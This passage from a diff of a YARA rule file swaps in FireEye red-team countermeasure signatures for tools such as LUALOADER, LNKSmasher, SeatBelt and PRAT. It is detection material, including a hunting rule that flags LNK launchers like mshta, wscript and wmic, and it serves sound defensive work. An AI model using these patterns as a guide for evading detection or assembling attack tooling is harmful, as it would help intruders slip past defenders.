+		$ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide
+		$ss5 = "1F 8B 08 00 00 00 00 00" wide
+		$ss6 = "\x00LoadLibrary\x00"
+		$ss7 = "\x00GetProcAddress\x00"
+		$ss8 = "\x00VirtualProtect\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_Dshell_2 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_1 : FILE
 {
 	meta:
-		description = "This rule looks for strings specific to the D programming language in combination with a selection of Windows functions that are present within a DShell payload"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "538e150f-0fb9-5a85-9299-9b4a57f8a606"
-		date = "2020-12-09"
-		modified = "2020-12-09"
+		id = "970a869e-bd69-5609-bb8d-77bfa78b0630"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/supplemental/yara/APT_Backdoor_Win_DShell_2.yar#L4-L132"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e0683f8ee787313cfd2c61cd0995a830"
-		logic_hash = "2b4d33c17cac35153346002c48457d9b46010f1c052df632c647c22c8d96b54c"
-		score = 60
-		quality = 20
+		logic_hash = "2d73d434ac39ebde990aca817a54208cd04bfbce33f1bcadcf48a50d9389658c"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		rev = 4
 
-	strings:
-		$dlang1 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\utf.d" ascii wide
-		$dlang2 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\file.d" ascii wide
-		$dlang3 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\format.d" ascii wide
-		$dlang4 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\base64.d" ascii wide
-		$dlang5 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\stdio.d" ascii wide
-		$dlang6 = "\\..\\..\\src\\phobos\\std\\utf.d" ascii wide
-		$dlang7 = "\\..\\..\\src\\phobos\\std\\file.d" ascii wide
-		$dlang8 = "\\..\\..\\src\\phobos\\std\\format.d" ascii wide
-		$dlang9 = "\\..\\..\\src\\phobos\\std\\base64.d" ascii wide
-		$dlang10 = "\\..\\..\\src\\phobos\\std\\stdio.d" ascii wide
-		$dlang11 = "Unexpected '\\n' when converting from type const(char)[] to type int" ascii wide
-		$ign1 = "--strip-comments"
-		$ign2 = "Usage: rdmd [RDMD AND DMD OPTIONS]"
-		$s1 = "CloseHandle"
-		$s2 = "CommandLineToArgvW"
-		$s3 = "CreateFileA"
-		$s4 = "CreateSemaphoreA"
-		$s5 = "CreateThread"
-		$s6 = "DeleteCriticalSection"
-		$s7 = "DeleteFileA"
-		$s8 = "DuplicateHandle"
-		$s9 = "EnterCriticalSection"
-		$s10 = "ExitProcess"
-		$s11 = "ExitThread"
-		$s12 = "ExpandEnvironmentStringsW"
-		$s13 = "FileTimeToDosDateTime"
-		$s14 = "FindClose"
-		$s15 = "FindFirstFileA"
-		$s16 = "FindFirstFileW"
-		$s17 = "FindNextFileA"
-		$s18 = "FindNextFileW"
-		$s19 = "FormatMessageW"
-		$s20 = "FreeEnvironmentStringsA"
-		$s21 = "FreeEnvironmentStringsW"
-		$s22 = "FreeLibrary"
-		$s23 = "GetACP"
-		$s24 = "GetCPInfo"
-		$s25 = "GetCommandLineA"
-		$s26 = "GetCommandLineW"
-		$s27 = "GetConsoleOutputCP"
-		$s28 = "GetConsoleScreenBufferInfo"
-		$s29 = "GetCurrentProcess"
-		$s30 = "GetCurrentThread"
-		$s31 = "GetCurrentThreadId"
-		$s32 = "GetEnvironmentStrings"
-		$s33 = "GetEnvironmentStringsW"
-		$s34 = "GetEnvironmentVariableA"
-		$s35 = "GetEnvironmentVariableW"
-		$s36 = "GetExitCodeThread"
-		$s37 = "GetFileAttributesW"
-		$s38 = "GetFileType"
-		$s39 = "GetLastError"
-		$s40 = "GetModuleFileNameA"
-		$s41 = "GetModuleHandleA"
-		$s42 = "GetOEMCP"
-		$s43 = "GetProcAddress"
-		$s44 = "GetProcessHeap"
-		$s45 = "GetStdHandle"
-		$s46 = "GetStringTypeA"
-		$s47 = "GetSystemInfo"
-		$s48 = "GetThreadContext"
-		$s49 = "GetTickCount"
-		$s50 = "GetTimeZoneInformation"
-		$s51 = "GetVersion"
-		$s52 = "GlobalAlloc"
-		$s53 = "GlobalFree"
-		$s54 = "GlobalMemoryStatus"
-		$s55 = "HeapAlloc"
-		$s56 = "HeapFree"
-		$s57 = "HeapReAlloc"
-		$s58 = "InitializeCriticalSection"
-		$s59 = "IsDebuggerPresent"
-		$s60 = "LCMapStringA"
-		$s61 = "LeaveCriticalSection"
-		$s62 = "LoadLibraryA"
-		$s63 = "LoadLibraryW"
-		$s64 = "LocalFree"
-		$s65 = "MessageBoxA"
-		$s66 = "MultiByteToWideChar"
-		$s67 = "QueryPerformanceCounter"
-		$s68 = "QueryPerformanceFrequency"
-		$s69 = "RaiseException"
-		$s70 = "ReadFile"
-		$s71 = "RegCloseKey"
-		$s72 = "RegCreateKeyExW"
-		$s73 = "RegDeleteKeyW"
-		$s74 = "RegDeleteValueW"
-		$s75 = "RegEnumKeyExW"
-		$s76 = "RegEnumValueW"
-		$s77 = "RegFlushKey"
-		$s78 = "RegOpenKeyExW"
-		$s79 = "RegOpenKeyW"
-		$s80 = "RegQueryInfoKeyW"
-		$s81 = "RegQueryValueExW"
-		$s82 = "RegSetValueExW"
-		$s83 = "ReleaseSemaphore"
-		$s84 = "ResumeThread"
-		$s85 = "RtlCaptureContext"
-		$s86 = "RtlUnwind"
-		$s87 = "SetConsoleCtrlHandler"
-		$s88 = "SetEnvironmentVariableW"
-		$s89 = "SetFilePointer"
-		$s90 = "SetHandleCount"
-		$s91 = "SetLastError"
-		$s92 = "Sleep"
-		$s93 = "SuspendThread"
-		$s94 = "SwitchToThread"
-		$s95 = "SystemTimeToTzSpecificLocalTime"
-		$s96 = "TryEnterCriticalSection"
-		$s97 = "TzSpecificLocalTimeToSystemTime"
-		$s98 = "UnhandledExceptionFilter"
-		$s99 = "VirtualAlloc"
-		$s100 = "VirtualFree"
-		$s101 = "WaitForSingleObject"
-		$s102 = "WideCharToMultiByte"
-		$s103 = "WriteConsoleA"
-		$s104 = "WriteFile"
-		$s105 = "lstrlenW"
+	strings:
+		$sb1 = { 1? 72 [4] 14 D0 [2] 00 02 28 [2] 00 0A 1? 8D [2] 00 01 13 ?? 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 28 [2] 00 0A 28 [2] 00 0A 80 [2] 00 04 7E [2] 00 04 7B [2] 00 0A 7E [2] 00 04 11 ?? 11 ?? 6F [2] 00 0A 6F [2] 00 0A }
+		$ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00"
+		$ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00"
+		$ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00"
+		$ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide
+		$ss5 = "1F 8B 08 00 00 00 00 00" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize > 500KB and filesize > 700KB and all of ( $s* ) and 1 of ( $dlang* ) and not $ign1 and not $ign2
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Prepshellcode_1 : FILE
+rule FIREEYE_RT_Dropper_LNK_Lnksmasher_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'PrepShellcode' project."
+		description = "The LNKSmasher project contains a prebuilt LNK file that has pieces added based on various configuration items. Because of this, several artifacts are present in every single LNK file generated by LNKSmasher, including the Drive Serial #, the File Droid GUID, and the GUID CLSID."
 		author = "FireEye"
-		id = "32fb6b1d-e01f-5555-8516-088dca2166cf"
+		id = "1b93ddf8-9578-5e47-b479-4c9e8a40b4f4"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PREPSHELLCODE/production/yara/HackTool_MSIL_PrepShellcode_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/production/yara/Dropper_LNK_LNKSmasher_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "aedae87d84275f6589c982c04175ddc0aee3e4f3ae959ced4b4e2294675522e6"
+		hash = "0a86d64c3b25aa45428e94b6e0be3e08"
+		logic_hash = "61d1ac67ac0d332ad842a522cbebe1b9af1482d58a210b50fb45209355c0aeeb"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 6
 
 	strings:
-		$typelibguid0 = "d16ed275-70d5-4ae5-8ce7-d249f967616c" ascii nocase wide
+		$drive_serial = { 12 F7 26 BE }
+		$file_droid_guid = { BC 96 28 4F 0A 46 54 42 81 B8 9F 48 64 D7 E9 A5 }
+		$guid_clsid = { E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D }
+		$header = { 4C 00 00 00 01 14 02 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$header at 0 and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPPATCHCHECK_1 : FILE
+rule FIREEYE_RT_Hunting_LNK_Win_Genericlauncher : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharppatchcheck' project."
+		description = "Signature to detect LNK files or OLE objects with embedded LNK files and generic launcher commands, except powershell which is large enough to have its own gene"
 		author = "FireEye"
-		id = "dedc12b9-b9e7-5c13-ad6d-2e286aba2302"
+		id = "1a12e475-bb18-55ab-b629-47b711c10e6b"
+		date = "2018-09-04"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/supplemental/yara/Hunting_LNK_Win_GenericLauncher.yar#L4-L22"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "14dd758e8f89f14612c8df9f862c31e4"
+		logic_hash = "a654cd3594e2d09950fb11bf8721a5cdb89f5d5be6e706f12e18c7fcdf7dd0fe"
+		score = 60
+		quality = 53
+		tags = "FILE"
+		rev = 7
+
+	strings:
+		$a01 = "cmd.exe /" ascii nocase wide
+		$a02 = "cscript" ascii nocase wide
+		$a03 = "jscript" ascii nocase wide
+		$a04 = "wscript" ascii nocase wide
+		$a05 = "wmic" ascii nocase wide
+		$a07 = "mshta" ascii nocase wide
+		$header = { 4C 00 00 00 01 14 02 }
+
+	condition:
+		(( $header at 0 ) or ( ( uint32( 0 ) == 0xE011CFD0 ) and $header ) ) and ( 1 of ( $a* ) )
+}
+rule FIREEYE_RT_Hacktool_MSIL_INVEIGHZERO_1 : FILE
+{
+	meta:
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'inveighzero' project."
+		author = "FireEye"
+		id = "f46fe365-ea50-5597-828e-61a7225e4c6e"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPPATCHCHECK_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/INVEIGHZERO/production/yara/HackTool_MSIL_INVEIGHZERO_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "dec6231b656eed1526d4f70fe1b9a476bfb06246f0a7c25f2687d8c68886d400"
+		logic_hash = "5d10557a83dae9508469fe87f4c0c91beec4d2812856eee461a82d5dbb89aa35"
 		score = 75
 		quality = 73
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$typelibguid0 = "528b8df5-6e5e-4f3b-b617-ac35ed2f8975" ascii nocase wide
+		$typelibguid0 = "113ae281-d1e5-42e7-9cc2-12d30757baf1" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDNS_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdns' project."
+		description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project."
 		author = "FireEye"
-		id = "db6b45be-f42f-5d0f-b50a-32e7a2cbfce6"
+		id = "46477f87-2458-5b8e-894a-9aa536a441ad"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDNS_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_1.yar#L4-L25"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "bab36f9b1532c3b24c2aea2907006820ed7cf1c90dae7a8138962e14ac9eff55"
+		hash = "848837b83865f3854801be1f25cb9f4d"
+		logic_hash = "4248e5561ef60e725c23efc89c899d6fc8be5bf2142f700fb70daecd72c30dd8"
+		score = 75
+		quality = 30
+		tags = "FILE"
+		rev = 3
+
+	strings:
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide
+		$str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide
+		$str3 = "LogonId=\"(\\d+)\"" ascii nocase wide
+		$str4 = "{0}.{1}.{2}.{3}" ascii nocase wide
+		$str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide
+		$str6 = "*[System/EventID={0}]" ascii nocase wide
+		$str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide
+		$str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide
+		$str9 = "{0}" ascii nocase wide
+		$str10 = "{0,-23}" ascii nocase wide
+
+	condition:
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+}
+rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_2 : FILE
+{
+	meta:
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SeatBelt project."
+		author = "FireEye"
+		id = "225b42fe-c73a-59c0-a1f4-1d6dff6e76e1"
+		date = "2020-12-09"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_2.yar#L4-L15"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "9f401176a9dd18fa2b5b90b4a2aa1356"
+		logic_hash = "e48474c5025fd88e3c2824e1e943ff56cde0ea05984aad0249ccf73caa6d4a36"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid0 = "d888cec8-7562-40e9-9c76-2bb9e43bb634" ascii nocase wide
+		$typelibguid1 = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_DNSOVERHTTPS_C2_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_PRAT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'DoHC2' External C2 project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'prat' project."
 		author = "FireEye"
-		id = "ee71be6c-e3c8-5365-9f32-157f00066c49"
+		id = "4a876eb0-ed2f-5ef2-a9b3-ba728b07c8c0"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_DNSOVERHTTPS_C2_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_PRAT_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "a482161bbd8e249977f28466ff1381d4693495f8b8ccd9183ae4fde1ec1471eb"
+		logic_hash = "d707f017b56b0a873f1edca085ad40fc70cb24e8c9844f377bc28871a941d0b4"
 		score = 75
-		quality = 71
+		quality = 67
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid0 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii nocase wide
-		$typelibguid1 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii nocase wide
+		$typelibguid0 = "7d1219fb-a954-49a7-96c9-df9e6429a8c7" ascii nocase wide
+		$typelibguid1 = "bc1157c2-aa6d-46f8-8d73-068fc08a6706" ascii nocase wide
+		$typelibguid2 = "c602fae2-b831-41e2-b5f8-d4df6e3255df" ascii nocase wide
+		$typelibguid3 = "dfaa0b7d-6184-4a9a-9eeb-c08622d15801" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPGOPHER_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPTEMPLATE_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpgopher' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharptemplate' project."
 		author = "FireEye"
-		id = "cc8eb9cd-9a51-5fab-b0a4-247baaa69dd7"
+		id = "0ca9a13c-e0a0-588b-be13-5954b17d95b1"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPGOPHER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPTEMPLATE_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "ac37f77440cb76d7dafa4c9b4130471ca6ca760f6d72691db9ebb8cbaaad0c58"
+		logic_hash = "9746c1ab7b945d311c53fbdf95993d255369e06b23a3279c9f2e8a4df73ab63c"
 		score = 75
 		quality = 73
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$typelibguid0 = "83413a89-7f5f-4c3f-805d-f4692bc60173" ascii nocase wide
+		$typelibguid0 = "e9e452d4-9e58-44ff-ba2d-01b158dda9bb" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPWEBCRAWLER_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPGOPHER_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpwebcrawler' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpgopher' project."
 		author = "FireEye"
-		id = "29b2a410-bcc4-58df-b192-7a413b3db1c0"
+		id = "cc8eb9cd-9a51-5fab-b0a4-247baaa69dd7"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPWEBCRAWLER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPGOPHER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "8df328663a813ca0a6864ae0503cbc1b03cfdf839215b9b4f2bb7962adf09bf8"
+		logic_hash = "ac37f77440cb76d7dafa4c9b4130471ca6ca760f6d72691db9ebb8cbaaad0c58"
 		score = 75
 		quality = 73
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$typelibguid0 = "cf27abf4-ef35-46cd-8d0c-756630c686f1" ascii nocase wide
+		$typelibguid0 = "83413a89-7f5f-4c3f-805d-f4692bc60173" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_REDTEAMMATERIALS_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPPATCHCHECK_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'red_team_materials' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharppatchcheck' project."
 		author = "FireEye"
-		id = "272cd3e9-884a-566b-ae90-4a79ee726a8d"
+		id = "dedc12b9-b9e7-5c13-ad6d-2e286aba2302"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_REDTEAMMATERIALS_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPPATCHCHECK_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "ca54a1e8335c4256295fc643f5d31eae2e89f020dc7a9b571c4772edaad08022"
+		logic_hash = "dec6231b656eed1526d4f70fe1b9a476bfb06246f0a7c25f2687d8c68886d400"
 		score = 75
-		quality = 71
+		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 2
 
 	strings:
-		$typelibguid0 = "86c95a99-a2d6-4ebe-ad5f-9885b06eab12" ascii nocase wide
-		$typelibguid1 = "e06f1411-c7f8-4538-bbb9-46c928732245" ascii nocase wide
+		$typelibguid0 = "528b8df5-6e5e-4f3b-b617-ac35ed2f8975" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPTEMPLATE_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPWEBCRAWLER_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharptemplate' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpwebcrawler' project."
 		author = "FireEye"
-		id = "0ca9a13c-e0a0-588b-be13-5954b17d95b1"
+		id = "29b2a410-bcc4-58df-b192-7a413b3db1c0"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPTEMPLATE_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPWEBCRAWLER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "9746c1ab7b945d311c53fbdf95993d255369e06b23a3279c9f2e8a4df73ab63c"
